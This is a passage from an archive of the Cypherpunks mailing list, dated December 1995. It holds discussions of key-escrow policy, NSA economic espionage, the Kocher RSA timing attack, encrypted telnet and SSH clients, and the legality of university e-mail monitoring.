and suggest to people that wearing them is completely "voluntary" in the
true sense--not the Newspeak GAK sense--and that they can of course choose
to remain unknown to others. This helps greatly in recognizing and
remembering names, and it's too bad name tags have been tagged as "uncool"
by so many.)

I guess to an outsider this party at the geodesic dome in the Santa Cruz
mountains must've seemed like the canonical California experience, complete
with hot tubs, redwoods, programmers, writers, etc. To us, it's just
normal.

By the way, in honor of the "geodesic network" and "geodesic payment
systems," and the geodesic dome the party was in, I propose we rename "e$"
with a more fitting name: "buckybucks." Or just "buckys" for short. ("Did
you remember to replenish the buckybits?")

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Sat, 16 Dec 1995 14:07:05 +0800
To: "David E. Smith" <Cypherpunks@toad.com>
Subject: Re: The Elevator Problem
Message-ID: <199512160410.XAA06462@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Dec 1995 09:11:45 -0600, David E. Smith wrote:

[..]

>The way I understand the system, in order for Alice to have Bob's key (and
>vice versa) they each have to transmit a considerable amount of data about
>their keys.  Even if those data are in the form of "twenty questions," neither
>knows anything about the other's key at the start.  Is there something
>painfully obvious that I'm missing?

Oddly enough, I saw this posted the same night I saw the timing-attack
against RSA announced.  Is there  a connection here?

If we assume a hypothetical future where the current families of
public key encryption can be easily broken, anyhow...

--Mutant Rob






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Sun, 17 Dec 1995 00:34:53 +0800
To: cypherpunks@toad.com
Subject: DEC Alta Vista
Message-ID: <199512161557.HAA25530@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Check out Digital's new Web and newsgroup search engine at:

http://www.altavista.digital.com/

Makes OpenText, Lycos, etc. look like turtles.

Crypto-relevance: The spider they used appears to have fully indexed the
HTML Cypherpunk list archive.  Extremely fast searches on your favorite
topics...

Joel





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 17 Dec 1995 05:19:38 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: NIST GAK meeting writeup, LONG part 3 of 3
Message-ID: <m0tR2sj-0008y9C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:48 PM 12/14/95 -0500, you wrote:
>jim bell writes:
>> It _is_ less voluntary, because it interferes with my right to escrow my key
>> with an organization that is willing to take the dispute to arbitrary levels
>> of uncooperativeness with the government.  I might insist, for example, that
>> the organization only store the key outside the country (beyond the reach of
>> US Courts) and require MY PERMISSION for them to release it to the
>> government.  I might also insist that they further encode the key so that
>> only an independent foreign organization (out of reach of US courts) could
>> provide the key to decrypt it.
>> 
>> If key escrow is REALLY REALLY REALLY "voluntary", then such arbitrary
>> restrictions should be do-able.
>
>Unless I've missed something large, you can have an _uncertified_ key escrow 
>agent store your keys in Fidel Castro's beard, and only release them with
>written permission from your goldfish. 
>
>Whether or not you use a certified key escrow agency would remain your 
>choice, AFAIK.
>
>I'm not expressing support for the certification standards that have been
>presented. But I don't consider it cause for great alarm that the USG wants
>to play in the escrow agent rating bureau business.

Here's the problem:  "Clipper" ALREADY isn't "voluntary," because the public
has already been forced to pay for its development via  stolen tax dollars.
At least hypothetically, the government could misuse its discretion even
further to push a Clipper-like solution, in order to skew the market against
the adoption of good encryption.  Follow me so far?  They could go as far as
to subsidize Clipper-installed telephones, making them cost &50 at your
local discount store, competitive with non-crypto phones. 

Okay, I presume that the  company that makes Clipper chips (VLSI Technology)
must ultimately sell them, UNPROGRAMMED, to manufacturers who are to build
those  telephones.  I see a business opportunity to act as a VOLUNTARY
escrow agent, but one that only agrees to keep the keys for the chips for
"30 feet or 30 seconds."  In other words, build (or modify) Clipper-type
telephones with chips that are ostensibly escrowed, but due to the agreement
with the end user the keys will be erased.  (Or, the keys will be kept
encrypted, unbreakably, with the "key to the key" given to the end user, who
will presumably burn it on receipt.)

What I _DON'T_ want to see happen is for the USG to be able to refuse
escrow-agent status to an organization which is actively hostile to the
concept of key escrow, an organization  which is willing to work with
end-users to thwart the USG's access  to products which (due to the fact
they were never exported) do not fall under any ITAR-type regulations. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 17 Dec 1995 05:50:59 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Netscape announces position against GAK
Message-ID: <m0tR37i-0008zsC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:16 AM 12/9/95 -0800, you wrote:

>http://home.netscape.com/newsref/ref/encryption_export.html
>
>>   NETSCAPE PRESENTS POLICY ON ENCRYPTION EXPORT TO KEY MEMBERS OF THE
>>                      ADMINISTRATION AND CONGRESS
>> 
>> ----------------------------------------------------------------------
>> 
>> This week Netscape representatives attending a government presentation
>> of the administration's proposed Key Escrow Policy for Export detailed
>> the company's firm opposition to the proposed policy. Netscape is
>> opposed to this type of proposal for a number of reasons including its
>> failure to adequately address the issues of acceptability by foreign
>> governments and corporations, significant personal privacy concerns,
>> and the mandatory nature of tying the Exportable Key Size to the Key
>> Escrow Proposal.
[rest of position deleted]

While this may be a reasonably good start, what I would have preferred that
you say is that if any kind of GAK system is adopted, either foreign or
domestic, you as a corporation would ENTHUSIASTICALLY do everything in your
power to  (_legally_) circumvent, undermine, sabotage, neutralize, and
counteract whatever goals the US government has with reqard to implementing
GAK. In other words, while you might stay barely within the letter of the
law, you would tirelessly exploit every possible loophole (both legal and
technical) to ensure that the government NEVER gets its way.  

I feel certain that with a few imaginative lawyers and programmers (both
foreign and domestic), it should be possible to turn this into a "nightmare
scenario" for the government.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 17 Dec 1995 07:01:12 +0800
To: pcw@access.digex.net (Peter Wayner)
Subject: Re: More Balto Sun on the NSA: Infowar
In-Reply-To: <v02130500acf7d6f1eacc@[199.125.128.5]>
Message-ID: <199512162211.OAA07646@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


PW on the NSA:

>The article also has some anecdotes about how the agency
>protected US firms abroad. One company was alerted that its
>European competitor was bribing the Latin American officials who
>were choosing the winning bid. Also, when the Peso collapsed,
>the US negotiators had access to some information that the
>Mexican government wasn't being as forthcoming as they should
>have been about the country's assets. They used this information
>in negotiations.

I'd like to point out how specious this supposed "benefit" is if
the NSA is actually now involved in economic espionage areas as this implies.
(@#$%^&*, I must have missed the senate meeting where they modified the 
charter, maybe it was the same one where they came up with Clipper)

suppose you get a message from our government with the implication
it came from the NSA: "Mr. businessman, we have information that so-and-so
bidder is involved in bribery". 

well, what can you do with this? why should
you give it any merit? the NSA has its own hidden agenda. they could
saying things to netscape like, "so-and-so cryptography is not secure.
don't use it". should netscape listen to them? isn't it obvious there
could be a conflict of interest, to say the least, and a delightful
opportunity for further spook "shadow" manipulation techniques, which
they get their wet dreams about?

the problem is that many businessmen are just as gullible and braindead
as the american public, and will roll over or listen with rapt attention
just like americans do when they hear the phrase, "national security".

there are many businessmen who think they are being "patriotic" by listening
to their government and cooperating with it in shadowy deals for the 
purpose of promoting "national security". frankly I think this is as
close to being a traitor to the true spirit of democracy as one can come
without ever being considered one by rational adults. (oh, well, the
distinction about rational adults has somewhat blurred in this century..)
Eisenhower's "military industrial complex" actually has the initials NSA..

so frankly, I would recommend that any businessmen who get "shadow"
tips from the government about how to run their business like PW describes
to tell them to ---- off. unless you're a patriot of course. then you
should turn me in for writing this message.

if the government actually had proof about their claims, that would be 
a different story. then I'd tell them to "---- off" *after* I got the
relevant info <g> .. but seriously this is not going to be a problem with
spooks, who love the following style of proof and information transmission:

"[x] is true because we know it is true, but exactly why is a matter of 
national security which we can't tell you. nevertheless because of [x] you 
should do [y]. in fact you are compelled to do it as a US patriot." 

just call it "proof by spook phlegm"

that's what we now have: a government of, by, and for the @#$%^&* spooks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jadestar@netcom.com (JaDe)
Date: Sun, 17 Dec 1995 06:56:40 +0800
To: joelm@eskimo.com (Joel McNamara)
Subject: Re: DEC Alta Vista
In-Reply-To: <199512161557.HAA25530@mail.eskimo.com>
Message-ID: <199512162218.OAA06706@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Check out Digital's new Web and newsgroup search engine at:
> 
> http://www.altavista.digital.com/
> 
> Makes OpenText, Lycos, etc. look like turtles.
> 
> Crypto-relevance: The spider they used appears to have fully indexed the
> HTML Cypherpunk list archive.  Extremely fast searches on your favorite
> topics...
> 
> Joel

	I'm impressed.  I accessed it in Lynx and it was
	*perfect* -- not a single inline <IMG> without an 
	appropriate Alt= attribute.

	As a quick test I did a search on something that I 
	new I'd posted to the comp.lang.awk newsgroups within
	that last couple of days.  It found them almost
	instantly (except that it was apparently arranged 
	chronologically -- so I had to hunt through several pages
	of [Next Set of Matches] links to find my stuff.

	(Sorry no cypher relevance I can add to this -- but 
	put that URL in your bookmarks folks).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmcurtin@goffer.cb.att.com (C Matthew Curtin)
Date: Sun, 17 Dec 1995 06:20:06 +0800
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: Encrypted telnet...
In-Reply-To: <9512151848.AA20590@spirit.aud.alcatel.com>
Message-ID: <9512162147.AA04565@goffer.cb.att.com.cb.att.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Dan> I am looking for an encrypted telnet (or rlogin/etc) package
Dan> that supports a Windoze client.  

You might want to check into STEL from CERT-IT; in their paper
describing it, they note that ports exist (as of June '95) on
HPUX, SunOS, IRIX, Solaris, and Linux. Since you mentioned an
interest in hacking some code yourself, you might want to see
if you could make a Windows port of their client.

STEL should be available via anonymous ftp at
	ftp://ftp.dsi.unimi.it/pub/security/cert-it/stel.tar.gz

CERT-IT can be found on the web at
	http://idea.sec.dsi.unimi.it/cert-it.html

...and the authors of the STEL paper, and their email addresses
are:

	David Vincenzetti	vince@dsi.unimi.it
	Stefano Taino		taino@dsi.unimi.it
	Fabio Bolognesi		bolo@dsi.unimi.it

- -matt

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNM+fBhyYuO2QvP9AQFarAP6A8wZqzf3sCCKmloZOTiWQRIv/puvUwmq
5wn1t0tzosMRW2VeKhluAwd/cNMywe0j4mpRzBLDKXgXp5/lMMR+99yAgXnRLXgK
7WHG4Qgvx/IMFLl0rOfvOpkDoLvXk4fWYM0gU8eTEf8Vja/ZsTo9rJ1Tq/JlRpn9
Mo4Z/QYFzMM=
=cezv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jonathan M. Bresler" <jmb@FreeBSD.ORG>
Date: Sun, 17 Dec 1995 08:01:27 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: kocher's timing attack
In-Reply-To: <199512151457.GAA27245@jobe.shell.portal.com>
Message-ID: <Pine.BSF.3.91.951216181017.28505B-100000@Aspen.Woc.Atinc.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Dec 1995, Hal wrote:

> As Kocher's paper implies, the known ciphertext attack is a TIMING
> attack.  Simply accumulating known text/signature pairs as you would have
> after a "key signing party" does not help.  You must know exactly how
> much time each signature took.

	how to use a timing attack?  across a network?  on the same host 
(therefore multiuser)?   or on a dedicated host, with a know algorithm 
and known ciphertext running DOS (no kernel or anything to preempt the 
process)?   using the famous appendix H registers of a 586 allows you to 
time the processing of instructions very well.

	dont have to know how long it takes to encrypt ahead of time.  
walk the key bit by bit (ouch bad pun) guessing 1 or 0 each time and 
looking to see if the correlations continue to appear or not.  horrendous 
problem, but a lot better than brute force.

	i really need to read the final paper when it is issued.

jmb

Jonathan M. Bresler        FreeBSD Postmaster         jmb@FreeBSD.ORG
play go. ride bike. hack FreeBSD.--ah the good life 
i am moving to a new job.                 PLEASE USE: jmb@FreeBSD.ORG





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Sun, 17 Dec 1995 08:26:12 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Is ths legal?...
Message-ID: <Pine.3.89.9512161825.A10054-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


I was told today that students at Oklahoma University have their computer
accounts subject to administrative inspection and that encryption (even
email) without escrow is prohibited. Maybe the story is not quite straight
but federal law supposedly protects personal electronic communication and
I somehow don't think OU can overide this simply because it passes thru
their computers. 

Sounds like another job for PGP.

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
 (KEY id 1024/80E4AA05) email for key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew C Bulhak <acb@cs.monash.edu.au>
Date: Sat, 16 Dec 1995 17:14:22 +0800
To: flat-earth@zikzak.net
Subject: Re: QUERY: e-politics mailing list
In-Reply-To: <v01530505acf60e2e11c6@[192.0.2.1]>
Message-ID: <199512160844.TAA07942@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


[Giles Bowkett]
> 
> Does anyone know of a mailing list organized around political issues
> regarding electronic networks, virtual community, the changing roles of
> the city and the corporation, and especially issues of class in a "wired"
> world?
> 
> Much thanx, pls pardon the spam.
> 
> PS - be careful about replying to all recipients - this message went to a
> couple different lists.

If there are issues which specifically concern you (as I assume
there are), why not start your own list?  Does ripco have a list server?
If so, ask the admin to set up a list for you.


-- 
acb@cs.monash.edu.au           If you call this a signature, you oppose its
acb@dev.null.org               reality.  If you do not call it a signature,
http://www.zikzak.net/~acb     you ignore the fact. Now what do you wish to 
Disclaimer: Or something...    call it?	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sun, 17 Dec 1995 10:01:28 +0800
To: cypherpunks@toad.com
Subject: Re: Is ths legal?...
Message-ID: <199512170131.UAA03707@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 16, 1995 18:37:05, 'Jay Holovacs <holovacs@styx.ios.com>' wrote: 
 
 
>I was told today that students at Oklahoma University have their computer 
>accounts subject to administrative inspection and that encryption (even 
>email) without escrow is prohibited. Maybe the story is not quite straight

>but federal law supposedly protects personal electronic communication and 
>I somehow don't think OU can overide this simply because it passes thru 
>their computers.  
> 
 
First, it may not be true. 
 
Second, if it is true, people frequently define the ability to do something
as a "privledge" not a "right." As in a hypothetical "Use of student
accounts at O.U. is a privledge extended to the students by the University.
By using our computer you keep to our rules, including abandoning any
notion you might have that your communications are in any way private" etc.
etc. 
 
--tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@artcom.de>
Date: Sun, 17 Dec 1995 04:29:28 +0800
To: pcw@access.digex.net
Subject: Re: Balto Sun Followup: Crypto AG a friend of Cypherpunks?
In-Reply-To: <v02130501acf7db56f315@[199.125.128.5]>
Message-ID: <m0tR2Mf-0002e8C@horten>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Peter" == Peter Wayner <pcw@access.digex.net> writes:

    Peter> My favorite detail, however, was the hint that the rumors
    Peter> are a "well conceived ploy" to harrass a company that is
    Peter> making strong crypto for independent countries. So maybe
    Peter> they're cypherpunks?

Nope. They're owned by the Federal Republic of Germany. They deliver
all cryptographic equipment for all TLAs in Germany. They're about as
much cypherpunks as the NSA is.

Andreas


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMNMfGEyjTSyISdw9AQHr9QP7Bojhmn/xsG92xZh9KWM6Dilon56M8oF4
roIe27SwF+Fmj8G72bK7TcgIPizpvhraT5O4/270pEvkbakYeAADbA5+K5cf3XbC
TLvZkqBtBHwJx56nyExfJdKDPD3cQlxymg2oj+8DzCq8f9Z4yUZrumvNjeAIlIks
bmJJ/11y1wU=
=1xSy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 17 Dec 1995 17:51:04 +0800
To: cypherpunks@toad.com
Subject: (fwd) Showdown over e-cash
Message-ID: <v02120d01acf92915736e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

X-Sender: dmk@zp.tempo.att.com
Mime-Version: 1.0
Date: Sat, 16 Dec 1995 20:27:29 -0500
To: www-buyinfo@allegra.att.com
From: allegra!dmk@uunet.uu.net (Dave Kristol)
Subject: Showdown over e-cash

Take a look at the article by that title at
        http://www.upside.com/resource/print/9601/ecash.html
It's a provocative and rather breathless account of the forthcoming demise
of banks as we know them, brought on by electronic transactions.

Dave Kristol
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sun, 17 Dec 1995 12:40:44 +0800
To: tallpaul <tallpaul@pipeline.com>
Subject: Re: Is ths legal?...
In-Reply-To: <199512170131.UAA03707@pipe6.nyc.pipeline.com>
Message-ID: <Pine.ULT.3.91.951216220159.26525A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 16 Dec 1995, tallpaul wrote:

> Second, if it is true, people frequently define the ability to do something
> as a "privledge" not a "right." As in a hypothetical "Use of student
> accounts at O.U. is a privledge extended to the students by the University.
> By using our computer you keep to our rules, including abandoning any
> notion you might have that your communications are in any way private" etc.
> etc. 

I believe there is a supreme court case that essentially says that a 
public entity cannot define something as either privledge or right.  I'm 
not sure the name, but the EFF has an abstract available.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMNN6WjokqlyVGmCFAQG6BwQAqqJhzk7BzJ+9Gmbl8Esf+8zcxVzEfAw+
GgPr8AMNz0KzgkOHDZsQOwqFM5wVqkpk8bzSUTCHu5YW8/ORfXHB7b/lmn03qkBd
ZZFEldfhoZFINfm4tdAd/8YfWF0WZeXiuDsRqJA/V4iRyIRj9+axpUPOFefDqkMD
gQR8KyPuSrw=
=Wagv
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Sun, 17 Dec 1995 07:15:54 +0800
To: cypherpunks@toad.com
Subject: Re: Motorola Secure Phone
In-Reply-To: <199512152338.XAA22526@pop01.ny.us.ibm.net>
Message-ID: <Pine.SOL.3.91.951217003923.29839A-100000@sun.digit.ee>
MIME-Version: 1.0
Content-Type: text/plain



What about cellular phones, especially GSM? As I have heard GSM is 
supposed to be secure, at least thats what the salespersons tell every 
time they are selling a GSM.

I know ciphering algorithms A3, A8 and A5 are used in GSM phones, but I 
know nothing more about them.

Jri Kaljundi
jk@digit.ee
Digiturg http://www.digit.ee/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Sun, 17 Dec 1995 19:25:19 +0800
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Encrypted telnet...
In-Reply-To: <9512151848.AA20590@spirit.aud.alcatel.com>
Message-ID: <199512170136.DAA02488@trance.olari.clinet.fi>
MIME-Version: 1.0
Content-Type: text/plain


> I am looking for an encrypted telnet (or rlogin/etc) package
> that supports a Windoze client.  
> 
> It looks like all the normal ones that I can find 
> (SSH, SRA telnet, SSLtelnet, etc) are just under Unixoids.  
> Don't get me wrong - I would prefer to use Unix, but I am
> headed off to locations, where I know all I'll have access to 
> is Windows, with a PPP stack to some ISP.

A preliminary windows client for SSH was recently announced by Cedomir
Igaly <cigaly@srce.hr>.  I am also working on a windows client myself,
and expect early beta versions to be available in early January, and
an official version in late February.

[For more information on ssh, see http://www.cs.hut.fi/ssh.]

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 18 Dec 1995 03:56:02 +0800
To: cypherpunks@toad.com
Subject: Re: Is ths legal?...
In-Reply-To: <199512170131.UAA03707@pipe6.nyc.pipeline.com>
Message-ID: <wkoy1Sq00YUvMl2sVN@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 16-Dec-95 Re: Is ths legal?... by
tallpaul@pipeline.com 
> Second, if it is true, people frequently define the ability to do something
> as a "privledge" not a "right." As in a hypothetical "Use of student
> accounts at O.U. is a privledge extended to the students by the University.
> By using our computer you keep to our rules, including abandoning any
> notion you might have that your communications are in any way private" etc.
> etc. 

Exactly. If Oklahoma University is private, it can establish and enforce
policies that would be unconstitutional at public schools. Those
policies become part of the contract and a student must abide by them,
except when they are administered arbitrarily and capriciously. At a
public universities, students probably would have more freedom to
challenge this policy.

A recent article from the school's student newspaper says:

"In the third part, the policy states that the university reserves the
right of access to user e-mail... Personal passwords may not be used to
prevent access. In the fourth part, the policy states that e-mail is
neither private nor confidential. The fifth part states important
documents should be saved in the computer or converted to hard copy."
(http://www.uoknor.edu/okdaily/issues/fall1995/dec-7/1-email.processed.html)

To me, "personal passwords" sounds like a student newspaper trying to
say "encryption."

I've copied this message to a grad student privacy advocate quoted in
the article and to the student newspaper. Perhaps they can shed more
light on the situation.

The best way to work against totalitarian administrators is to shine a
bright light on their repressive policies.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Sun, 17 Dec 1995 18:37:47 +0800
To: cypherpunks@toad.com
Subject: Re: Secured RM ? (source)
In-Reply-To: <199512170428.PAA22362@sweeney.cs.monash.edu.au>
Message-ID: <Pine.A32.3.91.951217051339.43966A-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 17 Dec 1995, Jiri Baum wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> There's no automatic rm that will also delete all backups of the file.
> (You are keeping backups, aren't you?)
> 

In this particular case what im concerned about is a temporary  cleartext 
copy of a permanently encrypted document.  The cleartext only exists for 
about 1-4 seconds, and then is deleted, so backups arent really a 
problem..  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 18 Dec 1995 03:54:49 +0800
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Is ths legal?...
In-Reply-To: <Pine.ULT.3.91.951216220159.26525A-100000@krypton.mankato.msus.edu>
Message-ID: <Pine.SUN.3.91.951217055442.19904B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 Dec 1995, Robert A. Hayden wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Sat, 16 Dec 1995, tallpaul wrote:
> 
> > Second, if it is true, people frequently define the ability to do something
> > as a "privledge" not a "right." As in a hypothetical "Use of student
> > accounts at O.U. is a privledge extended to the students by the University.
> > By using our computer you keep to our rules, including abandoning any
> > notion you might have that your communications are in any way private" etc.
> > etc. 
> 
> I believe there is a supreme court case that essentially says that a 
> public entity cannot define something as either privledge or right. 

I this ruling would prevent the Supreme Court from defining 
something as a privledge or right.

It would also pose this limitation on states, as they are public 
entities, and thus driver's licenses cannot be defined as one or the 
other, which as we all very well know, they are.
 I'm 
> not sure the name, but the EFF has an abstract available.
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: PGP Signed with PineSign 2.2
> 
> iQCVAwUBMNN6WjokqlyVGmCFAQG6BwQAqqJhzk7BzJ+9Gmbl8Esf+8zcxVzEfAw+
> GgPr8AMNz0KzgkOHDZsQOwqFM5wVqkpk8bzSUTCHu5YW8/ORfXHB7b/lmn03qkBd
> ZZFEldfhoZFINfm4tdAd/8YfWF0WZeXiuDsRqJA/V4iRyIRj9+axpUPOFefDqkMD
> gQR8KyPuSrw=
> =Wagv
> -----END PGP SIGNATURE-----
>  
> ____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
> \  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
>  \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
>    \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html
> 
> -----BEGIN GEEK CODE BLOCK-----
> Version: 3.1
> GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
> K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
> R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
> ------END GEEK CODE BLOCK------
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Sun, 17 Dec 1995 23:18:24 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Is ths legal?... (fwd)
Message-ID: <Pine.3.89.9512170951.A5895-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 17 Dec 1995, Declan B. McCullagh wrote:

> Exactly. If Oklahoma University is private, it can establish and enforce
> policies that would be unconstitutional at public schools. Those 
> policies become part of the contract and a student must abide by them, 
> except when they are administered arbitrarily and capriciously. At a
> public universities, students probably would have more freedom to 
> challenge this policy.  

Think about this principle in light of the current political climate
toward "privatization." Moves to privatize schools, prisons, even police
forces in a few communities. Sounds like a good way around all those
<pesky> constitutional protections. 

> A recent article from the school's student newspaper says: > 
> "In the third part, the policy states that the university reserves the
> right of access to user e-mail... 

It seems to me that there is some legal status to email established by 
Congress in the late '80s, especially that which comes in from outside 
with 'some expectation' of privacy. I've got to rummage around for the 
details however.

 Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
 (KEY id 1024/80E4AA05) email for key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Sun, 17 Dec 1995 23:22:38 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Is ths legal?.. (fwd)
Message-ID: <Pine.3.89.9512170924.A5895-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain




This is the reference I couldn't find for my previous post. It would seem 
to have some relevance here

 Electronic Communications Privacy Act of 1986 (ECPA) (18 U.S.C. ss 2510
et seq.).  "It shall not be unlawful under this chapter for an operator of
a switchboard, or an officer, employee, or agent of a provider of wire *or
electronic* communication service, whose facilities are used in the trans-
mission of a wire communication, to intercept, disclose, or use that
communication in the normal course of his employment while engaged in any
activity which is a necessary incident to the rendition of his service or
to the protection of the rights or property of the provider of that
service, except that a provider of wire communication service to the
public shall not utilize service observing or random monitoring except for
mechanical or service quality control checks."  18 USC section
2510(2)(a)(i). 

Doesn't seem to leave much room for snooping on contents of messages. 


Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
 (KEY id 1024/80E4AA05) email me for key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 17 Dec 1995 23:50:30 +0800
To: Jay Holovacs <holovacs@styx.ios.com>
Subject: Re: Is ths legal?.. (fwd)
In-Reply-To: <Pine.3.89.9512170924.A5895-0100000@styx.ios.com>
Message-ID: <Pine.SUN.3.91.951217101355.22454C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995, Jay Holovacs wrote:

> 
> 
> This is the reference I couldn't find for my previous post. It would seem 
> to have some relevance here
> 
